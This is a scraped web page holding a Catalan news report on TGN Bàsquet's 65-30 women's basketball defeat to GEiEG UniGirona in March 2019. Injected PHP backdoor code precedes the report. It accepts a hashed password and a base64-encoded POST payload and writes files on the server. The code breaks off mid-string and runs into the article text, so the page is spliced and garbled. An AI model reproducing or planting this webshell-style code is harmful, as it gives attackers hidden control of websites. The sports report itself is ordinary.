function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior s'estavella contra la intensitat i l'encert del GEiEG UniGirona (65-30) - Tgn Bàsquet Club -

El sènior s’estavella contra la intensitat i l’encert del GEiEG UniGirona (65-30)

Updated: març 23, 2019

El sènior del TGN Bàsquet ha patit aquest vespre una derrota contundent a la pista de l’equip més en forma de la categoria. El conjunt lila no ha pogut plantar cara a un rival, el Citylift GEiEG UniGirona, que ha estat molt superior des del primer minut i que no ha donat cap opció a les noies que entrena Juan Carlos Arjona. La bona defensa de les locals sobre Laura Hughes i sobre la directora de joc de les tarragonines, Laura Pascual, ha estat decisiva per entendre una desfeta que suposa la derrota més gran del TGN Bàsquet des que milita a Copa Catalunya. Els 35 punts de diferència superen d’aquesta manera els 34 de desavantatge que les tarragonines van encaixar contra el CBF Cerdanyola la temporada passada (76-42) i els també 34 punts de diferència del curs 2016-2017 a la pista del Barça CBS (78-44). Els 30 punts anotats a la pista de les gironines suposen, a més, l’anotació més baixa de l’equip lila en les quatre temporades a la màxima catagoria del bàsquet català.

Noquejades a l’inici

El GEiEG UniGirona ha sortit sense especular. Un parcial d’11-0 només iniciar-se el matx ha obligat Arjona a demanar temps mort per tallar de soca-rel l’allau de joc local però ha estat en va. El GEiEG UniGirona ha defensat molt bé en tot moment i no ha deixat que una de les principals armes ofensives de l’equip tarragoní, Laura Hughes, rebés en bones condicions. La defensa sobre les línies de passada ha estat un malson per a les visitants i el primer període s’ha acabat amb un marcador de 19-4.

Els problemes per anotar del TGN Bàsquet han estat constants. Les gironines han fet fora de la pista el conjunt lila, que no ha pogut sobreposar-se en cap moment a la immensa superioritat rival i prova d’això ha estat l’anotació de les tarragonines al descans (11 punts). La diferència després dels dos primers períodes era de 17 punts (28-11) i aquest desavantatge s’ha incrementat considerablement en el tercer quart.

El factor triple

Les locals han estat molt encertades des de la línia de tres punts (7/15, gairebé un 50% d’encert) i això les ha permès sentenciar. Si les gironines ja havien fet una molt bona feina defensiva, el complement de l’encert en el tir exterior ha estat massa pel TGN Bàsquet que, per contra, les ha vist quadrades des del perímetre (i per extensió, des de qualsevol posició de tir). El 0/17 en llançaments de tres punts mostra clarament les dificultats ofensives de les visitants que no han tingut el seu dia, registrant una de les pitjors actuacions del curs. Al final del tercer quart el partit estava resolt perquè el resultat era de 49-21 i l’únic que esperaven les tarragonines era el final del matx per acabar amb el malson que estaven vivint.

La diferència, però, s’ha mantingut estable al voltant dels 30 punts durant tot el quart període per finalitzar amb la màxima diferència al final del partit.

La jornada no ha estat gens bona pels interessos del TGN Bàsquet, que ha vist com alguns dels seus rivals directes guanyaven a domicili a pistes que, a priori, eren complicades.